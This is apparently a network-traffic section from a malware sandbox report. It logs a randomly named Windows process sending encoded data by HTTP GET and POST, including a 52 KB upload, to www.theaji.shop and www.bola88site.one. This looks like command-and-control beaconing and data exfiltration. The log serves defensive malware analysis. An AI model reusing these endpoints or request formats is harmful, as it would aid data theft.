Aug 27, 2024 17:48:36.983232021 CEST	1289	OUT	Data Raw: 65 77 30 67 71 48 6f 34 49 49 69 2f 31 51 48 67 69 4b 72 6c 36 48 4c 78 6c 2f 4e 48 35 71 33 68 48 65 71 30 61 56 48 70 7a 2b 66 4e 47 58 74 56 52 6a 44 77 4f 2f 78 73 44 72 4a 78 2f 6e 31 6f 46 33 4a 35 6b 41 31 72 67 76 78 4a 4e 36 52 56 61 50 Data Ascii: ew0gqHo4IIi/1QHgiKrl6HLxl/NH5q3hHeq0aVHpz+fNGXtVRjDwO/xsDrJx/n1oF3J5kA1rgvxJN6RVaPremXm6xabJ6Zk0AVFezwNplIy9XQOaeghSahR6jKg4WKLcxKbNJxnjHJLBF2/tpbaaK7+a+mlsRfb/IwRPqHy05Gv9Bp9kT70BpUBVJKXbx3647u5sj3ehRCUG34wkVFWT6kJo7wA0mJj6A+P1g625Lmp9PUdfRYO
Aug 27, 2024 17:48:36.983318090 CEST	6445	OUT	Data Raw: 54 63 51 34 34 5a 6f 33 34 68 6c 44 4a 38 71 42 79 71 4c 6d 64 34 6b 33 6d 53 7a 65 6e 56 43 61 61 6d 34 6b 6d 71 50 6a 4c 77 64 58 35 48 66 49 59 6a 4a 6f 2f 4d 44 4c 54 64 63 56 37 73 6a 34 36 6e 65 56 63 74 6f 34 52 30 58 6d 34 68 4f 4f 49 54 Data Ascii: TcQ44Zo34hlDJ8qByqLmd4k3mSzenVCaam4kmqPjLwdX5HfIYjJo/MDLTdcV7sj46neVcto4R0Xm4hOOITxkTYvuBk62A0I47yGiOplfE3Rn8Uhzu4iz7JWq0dJM6YHMZub960zzCrAx1WV5r5rpaiOzU2jP3t5PTZ+S0O7GaUUsmbYt/5vOTaBvMATcK1RB5z4mtIv5glJbWnaiOLmJFloctDmnKqdEJUc++rIdyMu+w3TCnGJ
Aug 27, 2024 17:48:36.983366013 CEST	2578	OUT	Data Raw: 73 79 31 56 66 78 4e 71 77 2f 46 48 59 71 71 4f 35 7a 61 31 2f 76 4f 39 6f 38 64 2f 30 72 78 30 4b 74 5a 73 4c 4b 5a 30 41 50 31 4f 71 78 44 41 47 43 36 54 51 36 31 57 48 7a 61 46 6b 59 4c 6b 67 77 65 66 59 73 77 6b 39 53 4c 47 51 46 6e 68 47 64 Data Ascii: sy1VfxNqw/FHYqqO5za1/vO9o8d/0rx0KtZsLKZ0AP1OqxDAGC6TQ61WHzaFkYLkgwefYswk9SLGQFnhGdRqC18OyRYrr03bDs+tEz63sWUSvxuLqq/NVqjRBATHKMiUwroPHOYsq+UhwGiZhPbWPgyv7+WiLckBjw+QyA9wkfJNjl23xollwKq27sZVxjGXTfkmhbMid7oqu94r51ZkLK18TEOIl1d4K2VkT4s9IpJ+jpNaFWJ
Aug 27, 2024 17:48:36.983536005 CEST	12890	OUT	Data Raw: 44 6d 5a 59 56 62 37 4d 2f 33 2b 56 6b 77 6e 58 58 38 75 30 6b 35 6d 53 61 70 72 68 37 39 57 36 4b 64 56 72 50 63 74 36 35 77 63 46 69 6d 5a 36 49 43 43 57 7a 35 7a 4c 4d 44 43 36 44 61 48 75 31 48 34 51 47 35 56 67 37 7a 67 33 55 62 56 52 57 31 Data Ascii: DmZYVb7M/3+VkwnXX8u0k5mSaprh79W6KdVrPct65wcFimZ6ICCWz5zLMDC6DaHu1H4QG5Vg7zg3UbVRW1QStYO8UAJuYJ3hwL8ks7RuqCE4jNwyBBFl0fNtifBkLn/fAnDdsW9vFDd//yTY8+JDV0v7JhJt4O9agtVJ+0rrDLPjPxOfDEidvUFHety9E9ThK55lPvLkEobzoAmriQqH/KvXZf9d3skbETRXB14CxDZ38Ke+tTn
Aug 27, 2024 17:48:37.086987972 CEST	1289	OUT	Data Raw: 62 38 34 36 45 4a 61 30 66 4e 46 2b 34 33 2f 61 63 6f 32 7a 4b 45 66 70 2b 36 6e 49 43 53 39 4f 6a 68 76 4a 4e 56 77 4d 62 48 31 4b 4f 73 78 30 79 6a 6b 32 4d 77 46 36 7a 30 57 49 7a 30 37 6f 77 41 2b 52 32 63 70 49 6e 4d 2b 51 71 4c 69 2f 70 65 Data Ascii: b846EJa0fNF+43/aco2zKEfp+6nICS9OjhvJNVwMbH1KOsx0yjk2MwF6z0WIz07owA+R2cpInM+QqLi/peazIwoIVIWn3wHW9IsWLg6O2On70M5rt9grtjvHkoRL5eaot4eEiVGQ8i4iUs5bljXUfRhhizTMRGSFzd3kXgmBNuWFtRdXI4qwbh7+rc5xivSfS9k45mB+YAb31R+Uglm7DJMc3NlmMKeOoGOQRiKCekLzlS5P5av
Aug 27, 2024 17:48:37.087038994 CEST	5156	OUT	Data Raw: 42 67 4f 6c 44 48 48 4f 31 46 36 72 39 67 30 62 4c 2b 69 46 2b 44 57 63 6c 32 48 2b 43 62 65 61 58 55 56 7a 77 52 41 35 62 51 78 57 4e 32 46 32 7a 70 4f 66 32 32 4c 6c 6c 38 66 4e 42 53 37 73 30 65 4b 6e 42 4e 56 50 76 53 54 4a 45 4a 76 6c 63 53 Data Ascii: BgOlDHHO1F6r9g0bL+iF+DWcl2H+CbeaXUVzwRA5bQxWN2F2zpOf22Lll8fNBS7s0eKnBNVPvSTJEJvlcSAXxyQ6ZoL3YJSYztGYsFgHomVGsVWEkU77WXGsxXBvr86VqlvHv4MVoiTRRFPi7NnNu9zNJoYa5G01gkq8ZRlaeCjYdMvhaExWpM9HLkSU9xsjkuVccBDdkkbN952Nt2ciL7vMdPySO5QJb06QJWy07S0Xrjy0kki
Aug 27, 2024 17:48:37.087256908 CEST	10985	OUT	Data Raw: 42 36 4a 62 6c 4c 71 43 6c 51 47 34 67 74 4d 76 76 6b 35 5a 6c 43 73 46 58 6e 33 6f 50 4a 5a 4b 6f 6e 49 54 57 75 69 68 37 70 31 58 70 42 74 2b 38 64 34 49 4b 67 36 61 4a 67 35 43 33 4f 59 66 6b 55 68 30 67 6d 42 62 48 72 5a 76 6a 33 39 68 69 69 Data Ascii: B6JblLqClQG4gtMvvk5ZlCsFXn3oPJZKonITWuih7p1XpBt+8d4IKg6aJg5C3OYfkUh0gmBbHrZvj39hiihIGX4MJ7Jhu/J9iL8vhPvEtdhe8Mdwooi+ehjYIy5GijzFdKONBEw4uJoNxgxWSCQwVttCj55lJySG5/PPNIbIrcVFJr+Niki5eesxWzwGyM0qD/ZrDx81d+Xa7mYjPiCBxofQI/KMWfUEi4cxo827O8CDircume7
Aug 27, 2024 17:48:37.197104931 CEST	457	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:48:36 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 277 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	49835	3.82.56.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:39.522396088 CEST	524	OUT	GET /q3za/?AvLLLbOh=RWnANPBTnIHygAxj+74p2fQt/r+QMu+ZbRPK+z1nLy5TPZ7mlunYNOVzlFQ68L6IsvBO8bEu8tkdQ9B+wYsoyn5BHOSzYZ2Hj+i3Yz8xBJ+jGbXNJ7HrFvE=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.theaji.shop Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:48:39.624238968 CEST	457	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:48:39 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 277 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 68 65 61 6a 69 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at www.theaji.shop Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.20	49836	172.96.191.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:45.206881046 CEST	794	OUT	POST /frol/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.bola88site.one Origin: http://www.bola88site.one Referer: http://www.bola88site.one/frol/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 50 32 7a 47 4f 41 36 71 70 6d 51 7a 6e 75 39 61 59 4b 79 51 50 46 6c 43 4a 74 78 34 46 61 64 48 78 65 2b 75 76 52 59 6a 77 70 54 71 37 75 4c 48 35 43 61 75 6c 54 62 72 38 30 66 6f 31 73 52 59 37 67 2f 6a 47 41 62 4e 72 43 6a 35 4c 48 5a 31 4f 72 46 75 30 76 58 41 50 6f 56 33 42 34 45 70 78 2b 7a 46 38 65 69 33 61 46 52 7a 6f 71 6b 63 72 5a 61 30 4e 6a 4e 6f 79 66 75 4f 58 2b 42 49 54 79 35 6c 6c 70 6e 56 6b 6a 34 43 78 4d 47 69 4c 31 73 54 6d 2b 59 54 4f 52 4e 36 36 50 52 6d 6c 55 66 44 4d 56 52 62 57 49 35 2b 57 67 75 37 56 6a 41 30 69 4a 39 67 54 6b 2b 68 69 72 6d 42 51 3d 3d Data Ascii: AvLLLbOh=VP2zGOA6qpmQznu9aYKyQPFlCJtx4FadHxe+uvRYjwpTq7uLH5CaulTbr80fo1sRY7g/jGAbNrCj5LHZ1OrFu0vXAPoV3B4Epx+zF8ei3aFRzoqkcrZa0NjNoyfuOX+BITy5llpnVkj4CxMGiL1sTm+YTORN66PRmlUfDMVRbWI5+Wgu7VjA0iJ9gTk+hirmBQ==
Aug 27, 2024 17:48:45.539205074 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 27 Aug 2024 15:48:45 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.20	49837	172.96.191.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:48.061391115 CEST	1134	OUT	POST /frol/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.bola88site.one Origin: http://www.bola88site.one Referer: http://www.bola88site.one/frol/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 50 32 7a 47 4f 41 36 71 70 6d 51 38 6e 65 39 64 2f 57 79 56 76 46 6d 48 4a 74 78 75 31 61 47 48 32 57 2b 75 75 56 78 6b 43 64 54 71 66 69 4c 47 38 75 61 74 6c 54 62 7a 73 30 61 6c 56 73 61 59 36 63 52 6a 48 4d 62 4e 71 69 6a 72 4e 54 5a 68 75 72 47 36 6b 76 55 48 50 6f 75 68 42 35 4c 70 78 7a 59 46 2b 69 69 33 4f 39 52 79 72 43 6b 4c 4f 31 56 77 74 6a 48 75 79 66 78 62 48 2b 62 49 54 2b 48 6c 68 6c 64 56 58 2f 34 62 51 73 47 6a 4c 31 6a 64 57 2b 66 59 75 51 68 70 36 48 64 76 56 77 37 48 4c 68 57 61 47 45 77 30 30 63 6a 33 30 65 38 74 33 52 33 35 7a 68 64 74 57 75 35 61 6e 32 49 53 67 4c 44 42 79 46 75 34 52 47 76 42 39 77 44 6e 6a 6a 65 78 4b 76 7a 53 52 54 61 4f 69 33 73 76 7a 71 52 46 32 53 65 34 59 73 65 58 6a 51 6d 52 4d 4f 4f 62 65 52 5a 2f 39 59 6b 52 36 30 6d 77 56 2f 41 41 52 36 44 77 64 76 73 35 74 78 59 63 33 5a 70 47 32 78 4e 53 53 75 4b 5a 74 6a 36 53 4d 4a 43 67 68 49 6d 62 72 2b 7a 44 58 55 6d 79 48 6e 2b 51 36 38 4e 41 54 39 43 50 31 36 30 4e 38 36 75 6f [TRUNCATED] Data Ascii: AvLLLbOh=VP2zGOA6qpmQ8ne9d/WyVvFmHJtxu1aGH2W+uuVxkCdTqfiLG8uatlTbzs0alVsaY6cRjHMbNqijrNTZhurG6kvUHPouhB5LpxzYF+ii3O9RyrCkLO1VwtjHuyfxbH+bIT+HlhldVX/4bQsGjL1jdW+fYuQhp6HdvVw7HLhWaGEw00cj30e8t3R35zhdtWu5an2ISgLDByFu4RGvB9wDnjjexKvzSRTaOi3svzqRF2Se4YseXjQmRMOObeRZ/9YkR60mwV/AAR6Dwdvs5txYc3ZpG2xNSSuKZtj6SMJCghImbr+zDXUmyHn+Q68NAT9CP160N86uoQFoMWKF3hHkJaiQbpF0uxnFZaAeKUDnnfPf1MEL5XhGNLpa2ZkiYAdwMxI2fLLYDgMnIBxtYsQQNdAzqcLlPMYD7MFKSHnI9tHKOBe0/zXYjdJpFYfymZqB+5URMCYdzMUmtH68znWWBfyJ1ofVYG9Jj39BFyQLxJDU3gSi9HhM+fHEp1P/lNvN4uC4KpI1f7GCdIK5JBz629k=
Aug 27, 2024 17:48:48.385226011 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 27 Aug 2024 15:48:48 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	49838	172.96.191.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:50.929811954 CEST	2578	OUT	POST /frol/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.bola88site.one Origin: http://www.bola88site.one Referer: http://www.bola88site.one/frol/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 56 50 32 7a 47 4f 41 36 71 70 6d 51 38 6e 65 39 64 2f 57 79 56 76 46 6d 48 4a 74 78 75 31 61 47 48 32 57 2b 75 75 56 78 6b 43 46 54 71 4d 71 4c 41 62 36 61 73 6c 54 62 37 4d 30 62 6c 56 73 4c 59 36 45 64 6a 48 77 55 4e 76 6d 6a 6f 65 72 5a 68 38 7a 47 78 45 76 5a 49 76 6f 57 33 42 35 66 70 78 2b 52 46 2b 6d 49 33 65 68 52 7a 70 61 6b 63 4a 42 61 79 39 6a 4e 75 79 66 39 51 6e 2b 54 49 54 71 58 6c 68 68 64 56 55 4c 34 59 44 45 47 6c 63 70 6a 55 6d 2b 63 43 65 51 75 2b 71 47 6c 76 56 30 76 48 4c 68 73 61 45 6f 77 30 30 38 6a 35 54 4b 39 74 58 52 33 6e 6a 68 65 70 57 71 39 61 6e 72 62 53 67 58 44 42 31 35 75 34 78 47 76 45 5a 45 41 75 6a 6a 59 6d 61 75 71 57 52 58 43 4f 6b 61 64 76 79 65 52 46 47 57 65 35 72 45 65 52 43 51 6d 63 4d 4f 41 45 4f 51 44 30 64 5a 6e 52 36 6b 63 77 56 66 2b 41 57 4b 44 68 4d 50 73 37 49 4e 5a 63 58 5a 76 44 32 78 69 45 53 69 57 5a 74 7a 6d 53 4d 49 50 67 67 4d 6d 59 62 4f 7a 43 53 67 68 31 58 6e 35 57 36 38 69 4c 7a 42 79 50 31 4f 73 4e 39 79 2b 6f [TRUNCATED] Data Ascii: AvLLLbOh=VP2zGOA6qpmQ8ne9d/WyVvFmHJtxu1aGH2W+uuVxkCFTqMqLAb6aslTb7M0blVsLY6EdjHwUNvmjoerZh8zGxEvZIvoW3B5fpx+RF+mI3ehRzpakcJBay9jNuyf9Qn+TITqXlhhdVUL4YDEGlcpjUm+cCeQu+qGlvV0vHLhsaEow008j5TK9tXR3njhepWq9anrbSgXDB15u4xGvEZEAujjYmauqWRXCOkadvyeRFGWe5rEeRCQmcMOAEOQD0dZnR6kcwVf+AWKDhMPs7INZcXZvD2xiESiWZtzmSMIPggMmYbOzCSgh1Xn5W68iLzByP1OsN9y+oQxoM2KF8mbnS6iTEZFq2RnWZaFNKVHdnujfzsULu3hHGLoT95kkPQdwMxEMfL3YDVgnJ21tIPIQLdA1qcL0PMUO7M9VSHXu9urKOVC08yXbmtJsS4fh7Jus+5YJMDpqmvQmsHq83nWRLfyK2ofDJWxNj3RwFyNQxLzUn3fKp1wT8vHfmlSAmrni+vXNF5oreO2wCoeDURTavLH7yfy0XE9oxrgp8x81W2LWTcAmUaAk/OzRnTsLtEi2AAuDXWs28BHkwqJy8Mm9GRJPxjk/zJc8rqhbGzgikixqz7nRRpdeVkM5Hk8DTVXUBopd8N+cgjIOhzQc2O8OptycYetXxl1FRKt2og9NxwlRPsp7LBLBhGfy7N+0YJNdYjXYDSXojIwMvAwCwpVRd4U49SuCE/3wRWWDmZ8VZ29+chq5XSphHy29CDn08n5UnGuSPCdI/zvxBzx+0fa9GOta/lpGf6maApCHEJuxPPgpBqmEt7UYNiO9ptmQYkD1ViDu6z2sOzewfgLUiyfbIDqFJUSS8ipZ7iVnfDFKEPf0ZtfGdnqEDZ6DSPcE8oHWODltCSH56ObJ8K1u2Z1Pz5F9qX5ao236uzv4VCPjYwI4mRUk5IUvyFSCZ8QgxHaUkL5opK6IX8lN763lQ0TJ4CUHi2M9jQtW6wi7d9crJoL [TRUNCATED]
Aug 27, 2024 17:48:50.929861069 CEST	6445	OUT	Data Raw: 45 31 62 64 79 78 6a 52 67 36 6a 68 5a 43 6d 65 74 50 71 65 78 35 52 6f 30 50 2b 73 63 67 55 77 48 4a 2f 37 4d 56 47 76 68 71 4c 79 6a 62 54 73 58 52 2f 4d 69 31 6f 4f 35 2b 55 69 52 6b 4b 45 4a 74 76 4d 63 59 42 34 4b 2f 46 54 71 6f 64 79 38 4c Data Ascii: E1bdyxjRg6jhZCmetPqex5Ro0P+scgUwHJ/7MVGvhqLyjbTsXR/Mi1oO5+UiRkKEJtvMcYB4K/FTqody8LMIpmbGoVWLlT4F7mCQ8Qwkh294ASNZQ/PLSeSD9EYckeYtr5A3ClWeQCPgAba7wfVhtn50bAcqQ7hZVw0hShcIBJ7pA6pW6CyiIL0VAwbgARP97oaJRfQRkK5VGXEWuK/gupKTsG6HLpDyz7GlSezQ/ucCDKTIujr
Aug 27, 2024 17:48:50.929925919 CEST	3867	OUT	Data Raw: 64 79 41 2f 62 41 48 2f 47 6b 6a 43 66 47 45 67 41 49 44 6c 68 76 71 42 31 49 36 36 52 4d 78 75 6a 50 48 6e 42 77 4a 78 72 53 5a 56 56 67 34 46 52 69 65 48 6b 59 73 61 2b 49 65 75 50 59 62 63 65 47 50 44 72 43 72 5a 37 4d 45 56 39 7a 47 70 58 6d Data Ascii: dyA/bAH/GkjCfGEgAIDlhvqB1I66RMxujPHnBwJxrSZVVg4FRieHkYsa+IeuPYbceGPDrCrZ7MEV9zGpXmCAA9CvNGZOwmh2WFE/bnfz1mzLWzH7774cpA5xFypwMa3IMU470y7N34xJEx3WTh/E8//f3TRGL8tjwyJ3zXIjL6AozxUwFYQ/ihBCM2XQsIHShEQMOwMh5buC6VxXlv0+Uxw9SelA0/bb1SgcZs10211M9GIrcWN
Aug 27, 2024 17:48:51.261825085 CEST	2578	OUT	Data Raw: 58 4a 72 61 32 4b 36 79 54 62 79 33 79 78 63 62 63 34 50 64 59 34 6d 44 6d 6a 2b 6c 42 46 50 71 53 51 43 48 46 70 31 38 66 73 6a 70 61 70 55 45 55 70 42 4b 2b 6f 62 49 56 56 45 30 52 6d 77 36 4f 59 64 56 74 58 72 43 4b 4b 66 34 77 2b 77 37 32 2f Data Ascii: XJra2K6yTby3yxcbc4PdY4mDmj+lBFPqSQCHFp18fsjpapUEUpBK+obIVVE0Rmw6OYdVtXrCKKf4w+w72/eskuXNn7iKcwECVu14NP4aE77oMBJ9/g30Puz8Qb1ZfjKzho0OJHbDB80aPg9MWXNY9GnDdQm+N+ytHsr+BdZ1O1+Ju1rb8/qu3yLkY0jLv9Ep2h8hM3SqwGaMPYf7zkUEzeBlfI1KIhCdlLQQc9nW8KLu+Iwk8cr
